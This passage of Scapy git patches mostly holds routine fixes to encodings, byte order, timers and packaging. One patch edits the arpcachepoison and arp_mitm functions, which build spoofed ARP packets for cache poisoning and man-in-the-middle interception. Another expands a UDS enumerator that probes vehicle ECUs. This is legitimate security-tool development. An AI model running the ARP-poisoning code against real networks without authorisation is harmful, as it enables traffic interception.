== version - os.unlink(version_filename) - with mock.patch('scapy._parse_tag', return_value='unknown.version'): - assert scapy._version() == "unknown.version" +with mock.patch("scapy._version_from_git_archive") as archive: + archive.return_value = "4.4.4" + assert scapy._version() == "4.4.4" + archive.side_effect = ValueError() + with mock.patch("scapy._version_from_git_describe") as git: + git.return_value = "3.3.3" + assert scapy._version() == "3.3.3" + git.side_effect = Exception() + assert scapy._version() == mtime.strftime("%Y.%m.%d") + with mock.patch("os.path.getmtime") as getmtime: + getmtime.side_effect = Exception() + assert scapy._version() == "0.0.0" = UTscapy HTML output From 470e2701ac1840a7582e6315c042342232e72d78 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 31 Jan 2023 22:05:05 +0100 Subject: [PATCH 0965/1632] Fix UTF-16 on s390x --- scapy/fields.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 87a5a2c0539..f820e183ae2 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1427,7 +1427,7 @@ class StrField(_StrField[bytes]): class StrFieldUtf16(StrField): def h2i(self, pkt, x): # type: (Optional[Packet], Optional[str]) -> bytes - return plain_str(x).encode('utf-16')[2:] + return plain_str(x).encode('utf-16-le') def any2i(self, pkt, x): # type: (Optional[Packet], Optional[str]) -> bytes @@ -1441,7 +1441,7 @@ def i2repr(self, pkt, x): def i2h(self, pkt, x): # type: (Optional[Packet], bytes) -> str - return bytes_encode(x).decode('utf-16', errors="replace") + return bytes_encode(x).decode('utf-16-le', errors="replace") class _StrEnumField: From da2658bfa3537089f8b5dc2218fb2455c793fff6 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Fri, 3 Feb 2023 07:01:47 +0000 Subject: [PATCH 0966/1632] Use network byte order explicitly to pack/unpack multi-byte integers in CoAP According to https://www.rfc-editor.org/rfc/rfc7252#section-1.2 > All multi-byte integers in this protocol are interpreted in network byte order. and according to https://www.rfc-editor.org/rfc/rfc7252#section-3.1 > A 16-bit unsigned integer in network byte order precedes the Option Value and indicates the Option Length minus 269. Also, judging by https://github.com/wireshark/wireshark/blob/8cddc32d35e36d9962495c3d4358842ea88aac41/epan/dissectors/packet-coap.c#L876 wireshark uses tvb_get_ntohs (which is roughly the same as unpack('!H')) too. It surfaced on big endian machines where `H` turned into `!H` by default https://github.com/secdev/scapy/issues/3847#issuecomment-1411565053: ``` >>> assert raw(CoAP(options=[("Location-Path", 'x' * 280)])) == b'\x40\x00\x00\x00\x8e\x0b\x00' + b'\x78' * 280 Traceback (most recent call last): File "", line 2, in AssertionError ``` This patch was tested on BE and LE machines in https://github.com/evverx/scapy/pull/1 along with some other patches making the unit tests pass. --- scapy/contrib/coap.py | 4 ++-- test/contrib/coap.uts | 3 ++- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/coap.py b/scapy/contrib/coap.py index a6f710f1b59..340b6a4d428 100644 --- a/scapy/contrib/coap.py +++ b/scapy/contrib/coap.py @@ -107,7 +107,7 @@ def _get_abs_val(val, ext_val): if val >= 15: warning("Invalid Option Length or Delta %d" % val) if val == 14: - return 269 + struct.unpack('H', ext_val)[0] + return 269 + struct.unpack('!H', ext_val)[0] if val == 13: return 13 + struct.unpack('B', ext_val)[0] return val @@ -127,7 +127,7 @@ class _CoAPOpt(Packet): @staticmethod def _populate_extended(val): if val >= 269: - return struct.pack('H', val - 269), 14 + return struct.pack('!H', val - 269), 14 if val >= 13: return struct.pack('B', val - 13), 13 return None, val diff --git a/test/contrib/coap.uts b/test/contrib/coap.uts index 2026bd97498..16dfc0f99b7 100644 --- a/test/contrib/coap.uts +++ b/test/contrib/coap.uts @@ -27,7 +27,8 @@ assert p.options == [('Uri-Path', b'.well-known'), ('Uri-Path', b'core')] assert raw(CoAP(options=[("Uri-Query", "query")])) == b'\x40\x00\x00\x00\xd5\x02\x71\x75\x65\x72\x79' = Extended option length -assert raw(CoAP(options=[("Location-Path", 'x' * 280)])) == b'\x40\x00\x00\x00\x8e\x0b\x00' + b'\x78' * 280 +assert raw(CoAP(options=[("Location-Path", 'x' * 280)])) == b'\x40\x00\x00\x00\x8e\x00\x0b' + b'\x78' * 280 +assert len(CoAP(b'\x40\x00\x00\x00\x8e\x00\x0b' + b'\x78' * 280 + b'\xff').options[0][1]) == 280 = Options should be ordered by option number assert raw(CoAP(options=[("Uri-Query", "b"),("Uri-Path","a")])) == b'\x40\x00\x00\x00\xb1\x61\x41\x62' From e04ccc676ea0b4bcd0baa2ba7ac03a6c6927a029 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 4 Feb 2023 11:55:36 +0100 Subject: [PATCH 0967/1632] arp_mitm: fix range iteration --- scapy/layers/l2.py | 41 ++++++++++++++++++++++++++++------------- 1 file changed, 28 insertions(+), 13 deletions(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 48e903d971f..e6679ce6f4d 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -733,6 +733,7 @@ class Dot1AD(Dot1Q): def arpcachepoison( target, # type: Union[str, List[str]] addresses, # type: Union[str, Tuple[str, str], List[Tuple[str, str]]] + broadcast=False, # type: bool interval=15, # type: int ): # type: (...) -> None @@ -745,6 +746,7 @@ def arpcachepoison( with the local interface's MAC. If it's a tuple, it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")]. "IP" can be a subnet of course. + :param broadcast: Use broadcast ethernet Examples for target "192.168.0.2":: @@ -769,8 +771,9 @@ def arpcachepoison( else: couple_list = addresses p = [ - Ether(src=y) / ARP(op="who-has", psrc=x, pdst=targets, - hwsrc=y, hwdst="00:00:00:00:00:00") + Ether(src=y, dst="ff:ff:ff:ff:ff:ff" if broadcast else None) / + ARP(op="who-has", psrc=x, pdst=targets, + hwsrc=y, hwdst="00:00:00:00:00:00") for x, y in couple_list ] try: @@ -852,16 +855,22 @@ def _tups(ip, mac): # We loop who-has requests srploop( list(itertools.chain( - (Ether(dst=maca, src=target_mac) / + (x + for ipa, maca in tup1 + for ipb, _ in tup2 + for x in + Ether(dst=maca, src=target_mac) / ARP(op="who-has", psrc=ipb, pdst=ipa, hwsrc=target_mac, hwdst="00:00:00:00:00:00") - for ipa, maca in tup1 - for ipb, _ in tup2), - (Ether(dst=macb, src=target_mac) / + ), + (x + for ipb, macb in tup2 + for ipa, _ in tup1 + for x in + Ether(dst=macb, src=target_mac) / ARP(op="who-has", psrc=ipa, pdst=ipb, hwsrc=target_mac, hwdst="00:00:00:00:00:00") - for ipb, macb in tup2 - for ipa, _ in tup1), + ), )), filter="arp and arp[7] = 2", inter=inter, @@ -873,16 +882,22 @@ def _tups(ip, mac): print("Restoring...") sendp( list(itertools.chain( - (Ether(dst=maca, src=macb) / + (x + for ipa, maca in tup1 + for ipb, macb in tup2 + for x in + Ether(dst=maca, src=macb) / ARP(op="who-has", psrc=ipb, pdst=ipa, hwsrc=macb, hwdst="00:00:00:00:00:00") + ), + (x + for ipb, macb in tup2 for ipa, maca in tup1 - for ipb, macb in tup2), - (Ether(dst=macb, src=maca) / + for x in + Ether(dst=macb, src=maca) / ARP(op="who-has", psrc=ipa, pdst=ipb, hwsrc=maca, hwdst="00:00:00:00:00:00") - for ipb, macb in tup2 - for ipa, maca in tup1), + ), )), iface=iface ) From 967564e979049e5acc773e12fc278248d7142f01 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 13 Feb 2023 18:41:18 +0100 Subject: [PATCH 0968/1632] Fix #3880: AutomotiveTestCaseExecutor on 32-bit machines (#3887) * Fix #3880 * apply suggestions --------- Co-authored-by: Nils Weiss --- scapy/contrib/automotive/scanner/enumerator.py | 4 ++-- scapy/contrib/automotive/scanner/executor.py | 11 +++++++---- 2 files changed, 9 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 196cde46d4d..4694f232619 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -288,7 +288,7 @@ def execute(self, socket, state, **kwargs): # log_automotive.debug("[i] Using iterator %s in state %s", it, state) - start_time = time.time() + start_time = time.monotonic() log_automotive.debug( "Start execution of enumerator: %s", time.ctime(start_time)) @@ -309,7 +309,7 @@ def execute(self, socket, state, **kwargs): "Finished execution count of enumerator") return - if (start_time + execution_time) < time.time(): + if (start_time + execution_time) < time.monotonic(): log_automotive.debug( "[i] Finished execution time of enumerator: %s", time.ctime()) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index b2d0b942621..aee6c71c132 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -184,7 +184,7 @@ def execute_test_case(self, test_case, kill_time=None): test_case_kwargs = dict() if kill_time: - max_execution_time = max(int(kill_time - time.time()), 5) + max_execution_time = max(int(kill_time - time.monotonic()), 5) cur_execution_time = test_case_kwargs.get("execution_time", 1200) test_case_kwargs["execution_time"] = min(max_execution_time, cur_execution_time) @@ -258,16 +258,19 @@ def scan(self, timeout=None): :return: None """ self.configuration.stop_event.clear() - kill_time = time.time() + (timeout or 0xffffffff) + if timeout is None: + kill_time = None + else: + kill_time = time.monotonic() + timeout log_automotive.debug("Set kill_time to %s" % time.ctime(kill_time)) - while kill_time > time.time(): + while kill_time is None or kill_time > time.monotonic(): test_case_executed = False log_automotive.info("[i] Scan progress %0.2f", self.progress()) log_automotive.debug("[i] Scan paths %s", self.state_paths) for p, test_case in product( self.state_paths, self.configuration.test_cases): log_automotive.info("Scan path %s", p) - terminate = kill_time <= time.time() + terminate = kill_time and kill_time <= time.monotonic() if terminate or self.configuration.stop_event.is_set(): log_automotive.debug( "Execution time exceeded. Terminating scan!") From c3c1bb6dffd83f3d2ecb8497ad2cac72e8e7ec49 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Fri, 3 Feb 2023 07:35:26 +0000 Subject: [PATCH 0969/1632] Use little-endian byte order to pack transaction lengths in PCOM According to https://www.unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf low bytes of transaction lengths come first. Other than that the "len" field itself is declared with LEShortField. Fixes the pcom test on big endian machines: ``` >>> r = b'\x65\x00\x04\x00\x00\x00\x00\x00' >>> raw(PCOMRequest() / b'\x00\x00\x00\x00')[2:] == r False >>> r = b'\x65\x00\x04\x00\x00\x00\x00\x00' >>> raw(PCOMResponse() / b'\x00\x00\x00\x00')[2:] == r False ``` This patch was tested on BE and LE machines in https://github.com/evverx/scapy/pull/1. --- scapy/contrib/scada/pcom.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/scada/pcom.py b/scapy/contrib/scada/pcom.py index 533109cdb47..d8386a22142 100755 --- a/scapy/contrib/scada/pcom.py +++ b/scapy/contrib/scada/pcom.py @@ -83,7 +83,7 @@ class PCOM(Packet): def post_build(self, pkt, pay): if self.len is None and pay: - pkt = pkt[:4] + struct.pack("H", len(pay)) + pkt = pkt[:4] + struct.pack(" Date: Wed, 15 Feb 2023 10:27:53 +0100 Subject: [PATCH 0970/1632] Improvement of UDS_ServieEnumerator (#3879) * add more generic UDS_ServieEnumerator * use generator * fix flake * fix doc --------- Co-authored-by: Nils Weiss --- scapy/contrib/automotive/uds_scan.py | 24 ++++++++++- .../automotive/scanner/uds_scanner.uts | 42 +++++++++++++++++++ 2 files changed, 64 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index c8bd9852edf..7a0308dccf6 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -294,16 +294,35 @@ def _get_table_entry_y(self, tup): class UDS_ServiceEnumerator(UDS_Enumerator): _description = "Available services and negative response per state" _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + "request_length": (int, lambda x: 1 <= x < 5) + }) _supported_kwargs["scan_range"] = \ ((list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param int request_length: Specifies the maximum length of arequest + packet. The enumerator will generate all + packets from a length of 1 (UDS Service + ID only) up to the specified + `request_length`.""" + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(UDS_ServiceEnumerator, self).execute(socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc + def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] # Only generate services with unset positive response bit (0x40) as # default scan_range scan_range = kwargs.pop("scan_range", (x for x in range(0x100) if not x & 0x40)) - return (UDS(service=x) for x in scan_range) + request_length = kwargs.pop("request_length", 1) + return itertools.chain.from_iterable( + ([UDS(service=x) / Raw(b"\x00" * req_len) + for req_len in range(request_length)] for x in scan_range)) def _evaluate_response(self, state, # type: EcuState @@ -324,7 +343,8 @@ def _evaluate_response(self, def _get_table_entry_y(self, tup): # type: (_AutomotiveTestCaseScanResult) -> str - return "0x%02x: %s" % (tup[1].service, tup[1].sprintf("%UDS.service%")) + return "0x%02x-%d: %s" % ( + tup[1].service, len(tup[1]), tup[1].sprintf("%UDS.service%")) class UDS_RDBIEnumerator(UDS_Enumerator): diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index cbcf057ad12..e354e0c67b1 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -254,6 +254,48 @@ assert "serviceNotSupported received 75 times" in result assert "serviceNotSupportedInActiveSession received 19 times" in result assert "securityAccessDenied received 2 times" in result += UDS_ServiceEnumerator + +def req_handler(resp, req): + if req.service != 0x22: + return False + if len(req) == 1: + resp.negativeResponseCode="generalReject" + return True + if len(req) == 2: + resp.negativeResponseCode="incorrectMessageLengthOrInvalidFormat" + return True + if len(req) == 3: + resp.negativeResponseCode="requestOutOfRange" + return True + return False + +resps = [EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId="ReadDataByIdentifier")], req_handler)] + +es = [UDS_ServiceEnumerator] + +scanner = executeScannerInVirtualEnvironment( + resps, es, UDS_ServiceEnumerator_kwargs={"request_length": 3}, unstable_socket=False) + +assert scanner.scan_completed +assert scanner.progress() > 0.95 +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +if tc.results_without_response: + tc.show() + +tc.show() + +assert len(tc.results_with_negative_response) == 128 * 3 +assert len(tc.results_with_positive_response) == 0 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "incorrectMessageLengthOrInvalidFormat" in result +assert "requestOutOfRange" in result + = UDS_RDBIEnumerator resps = [EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), From 669506bd42e4141718374ba297974881fe125fb8 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 17 Feb 2023 14:53:48 +0100 Subject: [PATCH 0971/1632] Migrate to `pyproject.toml` (#3869) * Migrate to `pyproject.toml` Co-authored-by: KOLANICH * Bump setuptools to 62.0.0 Otherwise we suffer from the bug described in pypa/setuptools, #3244 * Codecov: xml upload --------- Co-authored-by: KOLANICH --- .github/workflows/unittests.yml | 4 +- .gitignore | 1 + README.md | 3 +- pyproject.toml | 96 +++++++++++++++++++++++++++++++++ setup.cfg | 26 --------- setup.py | 87 ++++++------------------------ tox.ini | 9 ++-- 7 files changed, 121 insertions(+), 105 deletions(-) create mode 100644 pyproject.toml delete mode 100644 setup.cfg diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index f9f8e5cae45..ddd0961335b 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -125,9 +125,7 @@ jobs: - name: Run Tox run: UT_FLAGS="${{ matrix.flags }}" ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov - uses: codecov/codecov-action@v2 - with: - file: /home/runner/work/scapy/scapy/.coverage + uses: codecov/codecov-action@v3 cryptography: name: pyca/cryptography test diff --git a/.gitignore b/.gitignore index fa3030f1bb2..87aaa035354 100644 --- a/.gitignore +++ b/.gitignore @@ -6,6 +6,7 @@ MANIFEST *.egg-info/ test/*.html .coverage* +coverage.xml .tox .ipynb_checkpoints .mypy_cache diff --git a/README.md b/README.md index c1aa4d05ea1..d71f4115759 100644 --- a/README.md +++ b/README.md @@ -65,8 +65,7 @@ Other useful resources: - [Scapy in 20 minutes](https://github.com/secdev/scapy/blob/master/doc/notebooks/Scapy%20in%2015%20minutes.ipynb) - [Interactive tutorial](https://scapy.readthedocs.io/en/latest/usage.html#interactive-tutorial) (part of the documentation) -- [The quick demo: an interactive session](https://scapy.readthedocs.io/en/latest/introduction.html#quick-demo) -(some examples may be outdated) +- [The quick demo: an interactive session](https://scapy.readthedocs.io/en/latest/introduction.html#quick-demo) (some examples may be outdated) - [HTTP/2 notebook](https://github.com/secdev/scapy/blob/master/doc/notebooks/HTTP_2_Tuto.ipynb) - [TLS notebooks](https://github.com/secdev/scapy/blob/master/doc/notebooks/tls) diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 index 00000000000..ef7f4453fac --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,96 @@ +[build-system] +requires = [ "setuptools>=62.0.0" ] +build-backend = "setuptools.build_meta" + +[project] +name = "scapy" +dynamic = [ "version", "readme" ] +authors = [ + { name="Philippe BIONDI" }, +] +maintainers = [ + { name="Pierre LALET" }, + { name="Gabriel POTTER" }, + { name="Guillaume VALADON" }, +] +license = { text="GPL-2.0-only" } +requires-python = ">=3.7, <4" +description = "Scapy: interactive packet manipulation tool" +keywords = [ "network" ] +classifiers = [ + "Development Status :: 5 - Production/Stable", + "Environment :: Console", + "Intended Audience :: Developers", + "Intended Audience :: Information Technology", + "Intended Audience :: Science/Research", + "Intended Audience :: System Administrators", + "Intended Audience :: Telecommunications Industry", + "License :: OSI Approved :: GNU General Public License v2 (GPLv2)", + "Programming Language :: Python :: 3", + "Programming Language :: Python :: 3 :: Only", + "Programming Language :: Python :: 3.7", + "Programming Language :: Python :: 3.8", + "Programming Language :: Python :: 3.9", + "Programming Language :: Python :: 3.10", + "Topic :: Security", + "Topic :: System :: Networking", + "Topic :: System :: Networking :: Monitoring", +] + +[project.urls] +homepage = "https://scapy.net" +documentation = "https://scapy.readthedocs.io" +repository = "https://github.com/secdev/scapy" +changelog = "https://github.com/secdev/scapy/releases" + +[project.scripts] +scapy = "scapy.main:interact" + +[project.optional-dependencies] +basic = [ "ipython" ] +complete = [ + "ipython", + "pyx", + "cryptography>=2.0", + "matplotlib", +] +docs = [ + "sphinx>=3.0.0", + "sphinx_rtd_theme>=0.4.3", + "tox>=3.0.0", +] + +# setuptools specific + +[tool.setuptools] +zip-safe = false # We use __file__ in scapy/__init__.py, therefore Scapy isn't zip safe + +[tool.setuptools.packages.find] +include = [ + "scapy*", +] +exclude = [ + "test*", + "doc*", +] + +[tool.setuptools.dynamic] +version = { attr="scapy.VERSION" } + +# coverage + +[tool.coverage] +concurrency = "multiprocessing" +omit = [ + # Scapy specific paths + "scapy/tools/UTscapy.py", + "test/*", + # Scapy external modules + "scapy/libs/six.py", + "scapy/libs/winpcapy.py", + "scapy/libs/ethertypes.py", + # .tox specific path + ".tox/*", + # OS specific paths + "/private/*", +] diff --git a/setup.cfg b/setup.cfg deleted file mode 100644 index cbb75683e6c..00000000000 --- a/setup.cfg +++ /dev/null @@ -1,26 +0,0 @@ -[bdist_wheel] -universal = 1 - -[metadata] -description-file = README.md -license_file = LICENSE - -[sdist] -formats=gztar -owner=root -group=root - -[coverage:run] -concurrency = multiprocessing -omit = - # Scapy specific paths - scapy/tools/UTscapy.py - test/* - # Scapy external modules - scapy/modules/six.py - scapy/libs/winpcapy.py - scapy/libs/ethertypes.py - # .tox specific path - .tox/* - # OS specific paths - /private/* diff --git a/setup.py b/setup.py index aec60fb6e5c..e39245572e2 100755 --- a/setup.py +++ b/setup.py @@ -1,20 +1,27 @@ #! /usr/bin/env python """ -Distutils setup file for Scapy. +Setuptools setup file for Scapy. """ +import io +import os +import sys + +if sys.version_info[0] <= 2: + raise OSError("Scapy no longer supports Python 2 ! Please use Scapy 2.5.0") + try: - from setuptools import setup, find_packages + from setuptools import setup from setuptools.command.sdist import sdist except: raise ImportError("setuptools is required to install scapy !") -import io -import os def get_long_description(): - """Extract description from README.md, for PyPI's usage""" + """ + Extract description from README.md, for PyPI's usage + """ def process_ignore_tags(buffer): return "\n".join( x for x in buffer.split("\n") if "" not in x @@ -31,78 +38,18 @@ def process_ignore_tags(buffer): class SDist(sdist): - - def make_release_tree(self, base_dir, files): - sdist.make_release_tree(self, base_dir, files) + """ + Modified sdist to create scapy/VERSION file + """ + def make_release_tree(self, base_dir, *args, **kwargs): + super(SDist, self).make_release_tree(base_dir, *args, **kwargs) # ensure there's a scapy/VERSION file fn = os.path.join(base_dir, 'scapy', 'VERSION') with open(fn, 'w') as f: f.write(__import__('scapy').VERSION) - -# https://packaging.python.org/guides/distributing-packages-using-setuptools/ setup( - name='scapy', - version=__import__('scapy').VERSION, - packages=find_packages(exclude=["test"]), - data_files=[('share/man/man1', ["doc/scapy.1"])], cmdclass={'sdist': SDist}, - # Build starting scripts automatically - entry_points={ - 'console_scripts': [ - 'scapy = scapy.main:interact' - ] - }, - python_requires='>=3.7, <4', - # pip > 9 handles all the versioning - extras_require={ - 'basic': ["ipython"], - 'complete': [ - 'ipython', - 'pyx', - 'cryptography>=2.0', - 'matplotlib' - ], - 'docs': [ - 'sphinx>=3.0.0', - 'sphinx_rtd_theme>=0.4.3', - 'tox>=3.0.0' - ] - }, - # We use __file__ in scapy/__init__.py, therefore Scapy isn't zip safe - zip_safe=False, - - # Metadata - author='Philippe BIONDI', - author_email='phil(at)secdev.org', - maintainer='Pierre LALET, Gabriel POTTER, Guillaume VALADON', - description='Scapy: interactive packet manipulation tool', long_description=get_long_description(), long_description_content_type='text/markdown', - license='GPL-2.0-only', - url='https://scapy.net', - project_urls={ - 'Documentation': 'https://scapy.readthedocs.io', - 'Source Code': 'https://github.com/secdev/scapy/', - }, - download_url='https://github.com/secdev/scapy/tarball/master', - keywords=["network"], - classifiers=[ - "Development Status :: 5 - Production/Stable", - "Environment :: Console", - "Intended Audience :: Developers", - "Intended Audience :: Information Technology", - "Intended Audience :: Science/Research", - "Intended Audience :: System Administrators", - "Intended Audience :: Telecommunications Industry", - "License :: OSI Approved :: GNU General Public License v2 (GPLv2)", - "Programming Language :: Python :: 3", - "Programming Language :: Python :: 3.7", - "Programming Language :: Python :: 3.8", - "Programming Language :: Python :: 3.9", - "Programming Language :: Python :: 3.10", - "Topic :: Security", - "Topic :: System :: Networking", - "Topic :: System :: Networking :: Monitoring", - ] ) diff --git a/tox.ini b/tox.ini index 90957573a75..50466219968 100644 --- a/tox.ini +++ b/tox.ini @@ -6,7 +6,7 @@ envlist = py{27,34,35,36,37,38,39,310,py27,py39}-{linux,bsd}_{non_root,root}, py{27,34,35,36,37,38,39,310,py27,py39}-windows, skip_missing_interpreters = true -minversion = 2.9 +minversion = 4.0 # Main tests @@ -14,6 +14,7 @@ minversion = 2.9 description = "Scapy unit tests" allowlist_externals = sudo parallel_show_output = true +package = wheel passenv = PATH PWD @@ -28,7 +29,7 @@ deps = mock setuptools>=18.5 ipython cryptography - coverage + coverage[toml] python-can # disabled on windows because they require c++ dependencies brotli ; sys_platform != 'win32' @@ -43,7 +44,7 @@ commands = bsd_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -N {posargs} bsd_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark {posargs} windows: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc {posargs} - coverage combine + coverage xml -i # Variants of the main tests @@ -71,7 +72,7 @@ commands = bash -c "rm -rf /tmp/can-utils /tmp/can-isotp" lsmod sudo -E {envpython} -m coverage run -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} - coverage combine + coverage xml -i # Test used by upstream pyca/cryptography [testenv:cryptography] From 81b4f535abe0732a9005421e2818a1c4aef296fd Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 19 Feb 2023 12:32:59 +0300 Subject: [PATCH 0972/1632] Skip the Ether part of hashret in the LLTD build/dissection test (#3904) --- test/scapy/layers/lltd.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/scapy/layers/lltd.uts b/test/scapy/layers/lltd.uts index 08cd53393ab..bff8aa319b8 100644 --- a/test/scapy/layers/lltd.uts +++ b/test/scapy/layers/lltd.uts @@ -20,7 +20,7 @@ assert pkt.dst == pkt.real_dst assert pkt.src == pkt.real_src assert pkt.tos == 0 assert pkt.function == 0 -assert pkt.hashret() == b'\xd9\x88\x00\x00' +assert pkt.hashret()[2:] == b'\x00\x00' = Attribute build / dissection assert isinstance(LLTDAttribute(), LLTDAttribute) From 5dad9286dba5247c6367c3cb1acc2200d8317e3e Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 20 Feb 2023 17:47:44 +0300 Subject: [PATCH 0973/1632] Make pack and unpack match in homeplugav.WriteModuleDataRequest (#3903) DataLen seems to be a little-endian field because it's defined with fmt='>> string = b"goodchoucroute\x00\x00" >>> pkt = WriteModuleDataRequest(ModuleData=string) >>> pkt = WriteModuleDataRequest(pkt.build()) >>> pkt.show() ModuleID = PIB reserved_1= 0x0 DataLen = 4096 Offset = 0 checksum = 3975123099 ModuleData= 'goodchoucroute\x00\x00' >>> a = pkt.checksum == chksum32(pkt.ModuleData) >>> b = pkt.DataLen == len(pkt.ModuleData) >>> a, b (False, False) >>> assert a and b Traceback (most recent call last): File "", line 2, in AssertionError ``` It's worth mentioning that there are other places where packs and unpacks should probably be fixed: https://github.com/secdev/scapy/pull/2270#issuecomment-1431503009. --- scapy/contrib/homeplugav.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/homeplugav.py b/scapy/contrib/homeplugav.py index 4d005f7e94a..c4e79fac65f 100644 --- a/scapy/contrib/homeplugav.py +++ b/scapy/contrib/homeplugav.py @@ -641,10 +641,10 @@ class WriteModuleDataRequest(Packet): def post_build(self, p, pay): if self.DataLen is None: _len = len(self.ModuleData) - p = p[:2] + struct.pack('h', _len) + p[4:] + p = p[:2] + struct.pack(' Date: Mon, 20 Feb 2023 20:27:05 +0100 Subject: [PATCH 0974/1632] Fix 3901 (#3902) * remove scanner tests from pypy set isotp_soft_socket to nonblocking for performance test revert * add more generic UDS_ServieEnumerator * fix flake * Fix #3901 * revert change --------- Co-authored-by: Nils Weiss --- scapy/contrib/automotive/ecu.py | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index d09bf327b5f..b3cd34ecc10 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -16,7 +16,7 @@ from threading import Lock from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \ - Tuple, Type, cast, Dict, orb, ValuesView + Tuple, Type, cast, Dict, orb from scapy.packet import Raw, Packet from scapy.plist import PacketList from scapy.sessions import DefaultSession @@ -39,7 +39,7 @@ class EcuState(object): def __init__(self, **kwargs): # type: (Any) -> None - self.__cache__ = None # type: Optional[Tuple[List[EcuState], ValuesView[Any]]] # noqa: E501 + self.__cache__ = None # type: Optional[Tuple[List[EcuState], List[Any]]] # noqa: E501 for k, v in kwargs.items(): if isinstance(v, GeneratorType): v = list(v) @@ -47,18 +47,18 @@ def __init__(self, **kwargs): def _expand(self): # type: () -> List[EcuState] - if self.__cache__ is None or \ - self.__cache__[1] != self.__dict__.values(): + values = list(self.__dict__.values()) + keys = list(self.__dict__.keys()) + if self.__cache__ is None or self.__cache__[1] != values: expanded = list() - for x in itertools.product( - *[self._flatten(v) for v in self.__dict__.values()]): + for x in itertools.product(*[self._flatten(v) for v in values]): kwargs = {} - for i, k in enumerate(self.__dict__.keys()): + for i, k in enumerate(keys): if x[i] is None: continue kwargs[k] = x[i] expanded.append(EcuState(**kwargs)) - self.__cache__ = (expanded, self.__dict__.values()) + self.__cache__ = (expanded, values) return self.__cache__[0] @staticmethod From 3f6ed6a8cb37c71f493291b9c18bc92db89a67a5 Mon Sep 17 00:00:00 2001 From: ldaniel <48059820+KaptainH@users.noreply.github.com> Date: Fri, 24 Feb 2023 19:48:38 +0100 Subject: [PATCH 0975/1632] Add Optional Auth to BFD protocol (#3905) * Add Optional Authentification to BFD protocol * code cleaning * review modif * fix trailing whitespace --------- Co-authored-by: ldaniel --- scapy/contrib/bfd.py | 113 ++++++++++++++++++++++++++++++++++++++----- test/contrib/bfd.uts | 38 ++++++++++++++- 2 files changed, 137 insertions(+), 14 deletions(-) diff --git a/scapy/contrib/bfd.py b/scapy/contrib/bfd.py index 06565a03ab9..a06a80bd9c2 100644 --- a/scapy/contrib/bfd.py +++ b/scapy/contrib/bfd.py @@ -10,15 +10,32 @@ # scapy.contrib.description = BFD # scapy.contrib.status = loads + from scapy.packet import Packet, bind_layers, bind_bottom_up -from scapy.fields import BitField, BitEnumField, FlagsField, ByteField 